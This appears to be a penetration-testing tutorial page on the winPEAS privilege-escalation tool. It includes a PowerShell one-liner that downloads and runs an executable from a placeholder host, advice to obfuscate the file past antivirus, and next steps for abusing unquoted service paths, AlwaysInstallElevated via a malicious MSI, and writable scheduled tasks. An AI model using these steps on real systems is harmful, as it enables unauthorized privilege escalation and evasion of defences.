winPEAS


            
        

        


        
        
        
    
















winPEAS (Windows Privilege Escalation Awesome Script) is a powerful post-exploitation tool for Windows systems, designed to automate the discovery of local privilege escalation opportunities. It checks for a wide range of misconfigurations, exposed credentials, insecure services, and other system weaknesses that could be leveraged by attackers to elevate privileges.





Like linPEAS, it is commonly used by penetration testers, ethical hackers, and red teamers during the post-exploitation phase, after gaining initial access to a Windows machine.










Quick Command Snippet





Once you’ve gained access to a Windows system, run winPEAS using the following PowerShell command:





> powershell -nop -c "Invoke-WebRequest -Uri https://yourdomain.com/tools/winpeas_x64.exe -OutFile winpeas.exe; .\winpeas.exe"





This command downloads the winPEAS executable for 64-bit systems and runs it. Replace winpeas_x64.exe with winpeas_x86.exe for 32-bit systems if needed.







Note: winPEAS is often flagged by antivirus software, so consider obfuscating or renaming the file if it fails to run.












Overview of winPEAS Usage





How to Use winPEAS





To run winPEAS on a target Windows system:





    

  1. Transfer the Tool: Use PowerShell or another method to download the correct architecture version (x86 or x64) to the compromised machine.
    2. 




  2. Execute: Run the binary from a terminal or PowerShell prompt.
    3. 




  3. Analyze Output: Review the results to identify potential escalation vectors.
    4. 











Example Output





Here’s a sample snippet of what winPEAS might uncover:





[+] Interesting Services:
    - Unquoted Service Path: C:\Program Files\Some App\service.exe
    - Auto-run service with writable binary

[+] AlwaysInstallElevated is enabled:
    - HKLM\Software\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated = 1
    - HKCU\Software\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated = 1

[+] Insecure File Permissions:
    - C:\Program Files\App\config.ini is writable

[+] Scheduled Tasks:
    - \Updater\DailyCheck runs as SYSTEM
    - File path is writable










How to Interpret the Results





Key Sections to Investigate:





1. Unquoted Service Paths
These can be exploited to execute malicious binaries if the path contains spaces and is not properly quoted.







Next Step: Replace one of the expected executables in the path with your own payload.







2. AlwaysInstallElevated
If enabled, it allows any user to install MSI packages with elevated privileges.







Next Step: Craft a malicious .msi and install it using msiexec /quiet /qn /i malicious.msi.







3. Insecure Permissions
winPEAS reports files or directories with weak access controls.







Next Step: Modify these files to include malicious code or replace them entirely if they’re part of an auto-start process.







4. Scheduled Tasks
Poorly configured tasks running with SYSTEM privileges and writable paths can be hijacked.







Next Step: Replace the scheduled script or binary to escalate privileges.












Download winPEAS





Download the appropriate version of winPEAS for your target system:









Note: Always download winPEAS from a trusted and official source. Avoid running unverified executables on production or client systems.










Conclusion





winPEAS is a must-have tool in any Windows post-exploitation toolkit. It automates the process of hunting for privilege escalation paths and presents the results in a categorized, readable format.





Next Steps:





Review each identified item carefully and determine the safest, most effective way to escalate privileges.





Always ensure you’re authorized to test the system you’re analyzing.





Run winPEAS after gaining a foothold to look for weak spots.